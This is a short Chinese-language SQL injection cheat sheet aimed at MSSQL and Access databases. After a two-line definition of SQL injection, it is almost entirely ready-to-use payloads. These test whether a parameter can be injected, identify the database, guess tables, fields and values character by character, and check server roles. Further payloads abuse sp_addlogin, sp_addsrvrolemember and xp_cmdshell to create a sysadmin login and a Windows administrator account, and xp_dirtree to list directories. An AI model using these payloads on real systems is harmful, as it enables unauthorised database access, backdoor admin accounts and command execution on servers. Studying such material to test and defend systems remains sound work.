sql注入产生的条件:
- 用户能够控制输入
- 原本程序执行的语句拼接了用户输入的数据
sql注入的实质
通过把sql命令插入到web表单提交、输入域名或页面请求的查询字符串中,最终达到欺骗服务器执行恶意sql命令的目的
手工注入
判断是否有注入
;and 1=1
;and 1=2
初步判断是否是mssql (微软的SQL Server数据库服务器)
;and user > 0
判断数据库系统
;and (select count(*) from sysobjects) > 0 mssql
;and (select count(*) from msysobjects) > 0 access
注入参数是字符型时
'and [查询条件] and "='
搜索时没有过滤参数的情况
'and [查询条件] and '%25'='
猜数据库
;and (select count(*) from [数据库铭]) > 0
猜字段
;and (select count(字段名) from [数据库名]) > 0
猜字段中记录长度
;and (select top 1 len(字段名) from [数据库名]) > 0
猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from [数据库名]) > 0
猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from [数据库]) > 0
测试权限结构(mssql)
;and 1 = (select IS_SRVROLEMEMBER('sysadmin'));--
;and 1 = (select IS_SRVROLEMEMBER('serveradmin'));--
;and 1 = (select IS_SRVROLEMEMBER('setiupadmin'));--
;and 1 = (select IS_SRVROLEMEMBER('securityadmin'));--
;and 1 = (select IS_SRVROLEMEMBER('diskadmin'));--
;and 1 = (select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1 = (select IS_MEMBER('db_owner'));--
添加mssql和系统的账户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null , username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
遍历目录
;create table dirs(paths varchar(100),id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs) > 0
;and (select top 1 paths from dirs where paths not in ('上步得到的paths'))>)